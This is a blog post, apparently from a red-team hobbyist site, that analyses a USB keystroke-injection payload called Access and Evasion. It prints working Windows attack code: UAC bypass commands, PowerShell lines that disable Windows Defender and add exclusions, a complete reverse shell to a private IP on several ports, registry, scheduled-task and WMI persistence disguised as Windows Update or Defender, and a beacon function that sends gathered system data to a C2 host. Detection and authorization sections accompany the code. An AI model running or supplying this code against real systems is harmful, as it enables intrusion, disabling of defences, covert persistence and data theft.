zerodumb@hacking-journal:~/happy-frog$

Access and Evasion: Advanced Red Team Payload Analysis

June 28, 2025 · 10 min read

educationhidautomationmicrocontrollerscybersecurityredteam

🔴 Access and Evasion: Advanced Red Team Payload Analysis

Introduction

The Access_and_Evasion.txt payload represents a production-ready red team tool designed for comprehensive initial access and defensive evasion testing. This document provides an in-depth analysis of the payload’s components, techniques, and educational value for cybersecurity professionals.

What is Access and Evasion?

Access and Evasion is a sophisticated Happy Frog Script payload that demonstrates realistic red team techniques for:

Initial Access: Rapid system compromise via HID devices
Privilege Escalation: Multiple UAC bypass methods
Antivirus Evasion: Comprehensive Windows Defender bypass
Persistence: Multiple persistence mechanisms
Command & Control: Robust C2 communication
Defensive Evasion: Stealth and cleanup operations

Technical Architecture

Payload Structure

The payload is organized into 11 distinct sections, each serving a specific purpose in the attack lifecycle:

1. Stealth Initialization
2. UAC Bypass and Privilege Escalation  
3. Antivirus Evasion and Stealth
4. Establish Reverse Shell
5. Establish Persistence
6. Information Gathering
7. Establish Covert Channels
8. Establish Command & Control
9. Defensive Evasion
10. Final Persistence Verification
11. Cleanup and Exit

Key Technical Components

1. UAC Bypass Techniques

Fodhelper Method:

fodhelper
powershell -WindowStyle Hidden -Command "Start-Process powershell -Verb RunAs -WindowStyle Hidden"

ComputerDefaults Method:

computerdefaults
powershell -WindowStyle Hidden -Command "Start-Process powershell -Verb RunAs -WindowStyle Hidden"

Registry-Based Method:

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v "" /t REG_SZ /d "powershell.exe -WindowStyle Hidden" /f
computerdefaults

2. Antivirus Evasion

The payload implements comprehensive Windows Defender bypass:

# Disable real-time monitoring
Set-MpPreference -DisableRealtimeMonitoring $true -Force

# Disable behavior monitoring  
Set-MpPreference -DisableBehaviorMonitoring $true -Force

# Disable IOAV protection
Set-MpPreference -DisableIOAVProtection $true -Force

# Disable cloud protection
Set-MpPreference -MAPSReporting Disabled -Force

# Add exclusions
Add-MpPreference -ExclusionPath "$env:APPDATA\Microsoft\Windows\Update" -Force

3. Reverse Shell Implementation

Direct Execution:

try { 
    $ports = @(4444, 4445, 8080, 8443, 443)
    foreach($port in $ports) {
        try {
            $client = New-Object System.Net.Sockets.TCPClient("192.168.1.100", $port)
            $stream = $client.GetStream()
            $reader = New-Object System.IO.StreamReader($stream)
            $writer = New-Object System.IO.StreamWriter($stream)
            $writer.AutoFlush = $true
            
            while($true) {
                $command = $reader.ReadLine()
                if($command -eq "exit") { break }
                if($command -eq "kill") { exit }
                
                $output = Invoke-Expression $command 2>&1
                $writer.WriteLine($output)
            }
            $client.Close()
            break
        } catch {
            continue
        }
    }
} catch {
    "Reverse shell failed, continuing with persistence setup" | Out-File "$env:APPDATA\Microsoft\Windows\Update\logs\reverse_shell_failed.log" -Append
}

Key Features:

Multiple fallback ports (4444, 4445, 8080, 8443, 443)
Automatic reconnection logic
Error handling and logging
Kill command support

4. Persistence Mechanisms

Registry Persistence:

New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "WindowsUpdate" -Value "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File `"$env:APPDATA\Microsoft\Windows\Update\persist.ps1`"" -PropertyType String -Force

Scheduled Task Persistence:

schtasks /create /tn "WindowsDefender" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File `"$env:APPDATA\Microsoft\Windows\Update\defender.ps1`"" /sc onlogon /ru System /f

WMI Persistence:

$filter = New-Object -ComObject WbemScripting.SWbemFilter
$filter.EventNameSpace = "root\cimv2"
$filter.QueryLanguage = "WQL"
$filter.Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA \"Win32_LocalTime\""
$consumer = New-Object -ComObject WbemScripting.SWbemConsumer
$consumer.Name = "WindowsUpdate"
$consumer.CommandLineTemplate = "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File \"$env:APPDATA\Microsoft\Windows\Update\wmi.ps1\""
$filter.ConnectEventConsumer($consumer)

5. Information Gathering

The payload collects comprehensive system intelligence:

System Information:

Hostname, username, domain
OS version and architecture
Memory and processor details
System uptime

Network Information:

Network interfaces and IP addresses
Routing tables
DNS configuration
ARP tables

User and Group Information:

Local users and groups
Administrator accounts
Current user group memberships

Process and Service Information:

Running processes (top 20 by CPU)
Active services
Startup programs

6. Command & Control

Multi-Protocol C2:

function Send-Data {
    param($data, $target = "192.168.1.100")
    
    # Try HTTP first
    try {
        $headers = @{ "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" }
        $body = @{ "data" = $data; "timestamp" = (Get-Date).ToString() } | ConvertTo-Json
        Invoke-RestMethod -Uri "http://$target:8080/beacon" -Method POST -Headers $headers -Body $body -TimeoutSec 10
        return $true
    } catch {
        # Try TCP as fallback
        try {
            $client = New-Object System.Net.Sockets.TCPClient($target, 4446)
            $stream = $client.GetStream()
            $writer = New-Object System.IO.StreamWriter($stream)
            $writer.AutoFlush = $true
            $writer.WriteLine($data)
            $client.Close()
            return $true
        } catch {
            return $false
        }
    }
}

Educational Value

Red Team Perspective

Attack Lifecycle Coverage

This payload demonstrates the complete MITRE ATT&CK attack lifecycle:

Initial Access (TA0001): HID device compromise
Execution (TA0002): PowerShell execution
Persistence (TA0003): Registry, scheduled tasks, WMI
Privilege Escalation (TA0004): UAC bypass
Defense Evasion (TA0005): Antivirus bypass, stealth
Credential Access (TA0006): User enumeration
Discovery (TA0007): System reconnaissance
Lateral Movement (TA0008): Network enumeration
Collection (TA0009): Data collection
Command and Control (TA0011): C2 communication

Advanced Techniques Demonstrated

UAC Bypass Methods:

Fodhelper bypass (T1548.002)
ComputerDefaults bypass (T1548.002)
Registry manipulation (T1112)

Antivirus Evasion:

Disable security tools (T1562.001)
Add exclusions (T1562.001)
Process injection (T1055)

Persistence Techniques:

Registry run keys (T1547.001)
Scheduled tasks (T1053.005)
WMI event subscription (T1546.003)

Defensive Perspective

Detection Opportunities

Process Monitoring:

Multiple PowerShell instances
Hidden window creation
Process injection

Network Monitoring:

Outbound connections to multiple ports
HTTP POST requests to suspicious endpoints
TCP connections to C2 infrastructure

Registry Monitoring:

Run key modifications
WMI event subscription creation
Antivirus exclusion additions

File System Monitoring:

Hidden directory creation
PowerShell script creation
Timestamp manipulation

Defensive Measures

Prevention:

USB port restrictions
PowerShell execution policy
UAC enforcement
Antivirus exclusions monitoring

Detection:

Process monitoring
Network traffic analysis
Registry monitoring
File system monitoring

Response:

Process termination
Network isolation
Registry cleanup
File removal

Real-World Applications

Penetration Testing

This payload is valuable for:

Physical Security Testing:

USB drop testing
Physical access assessment
Social engineering validation

Red Team Operations:

Initial access simulation
Persistence testing
C2 infrastructure validation

Security Assessment:

Antivirus effectiveness testing
Detection capability validation
Incident response testing

Educational Scenarios

Security Training:

Attack technique demonstration
Defensive strategy development
Incident response practice

Research and Development:

Security tool evaluation
Detection method development
Countermeasure testing

Safety and Ethical Considerations

Authorization Requirements

Critical Requirements:

Written authorization for testing
Isolated test environment
Proper documentation
Incident response procedures

Legal Considerations:

Compliance with local laws
Respect for privacy
Proper data handling
Documentation requirements

Risk Mitigation

Testing Environment:

Isolated network
Virtual machines
Backup systems
Monitoring tools

Safety Procedures:

Emergency shutdown procedures
Network isolation capabilities
Data backup procedures
Incident response plans

Technical Implementation Details

Error Handling

The payload implements comprehensive error handling:

try {
    # Primary operation
} catch {
    # Fallback operation
    # Logging
    # Graceful degradation
}

Logging and Monitoring

Log Files Created:

reverse_shell_failed.log
wmi_failed.log
c2_success.log
c2_failed.log
system_info.json
status.json

Stealth Features

File System Stealth:

Hidden directories
Timestamp manipulation
Covert file locations

Process Stealth:

Hidden windows
Background execution
Process injection

Network Stealth:

Multiple protocols
Fallback mechanisms
Encrypted communication

Future Enhancements

Potential Improvements

Advanced Evasion:

Process hollowing
DLL injection
Memory-only execution
Encrypted payloads

Enhanced C2:

Domain fronting
DNS tunneling
Encrypted channels
Multi-stage payloads

Improved Persistence:

Boot persistence
Firmware persistence
Cloud persistence
Cross-platform persistence

Research Opportunities

Detection Research:

Behavioral analysis
Machine learning detection
Anomaly detection
Threat hunting

Defense Research:

Advanced monitoring
Automated response
Threat intelligence
Security orchestration

Conclusion

The Access and Evasion payload represents a sophisticated red team tool that demonstrates realistic attack techniques while providing comprehensive educational value. Its modular design, error handling, and stealth features make it suitable for advanced security testing and research.

Key Takeaways

Comprehensive Coverage: The payload demonstrates the complete attack lifecycle
Realistic Techniques: Uses actual red team methods and tools
Educational Value: Provides hands-on learning opportunities
Safety Focus: Includes proper error handling and logging
Defensive Insight: Enables detection and response development

Responsible Use

Remember that this payload is designed for:

Authorized testing only
Educational purposes
Security research
Defensive development

Always obtain proper authorization before any security testing and ensure compliance with applicable laws and regulations.

This document is part of the Happy Frog educational framework, designed to promote understanding of cybersecurity threats and defenses through hands-on learning and research.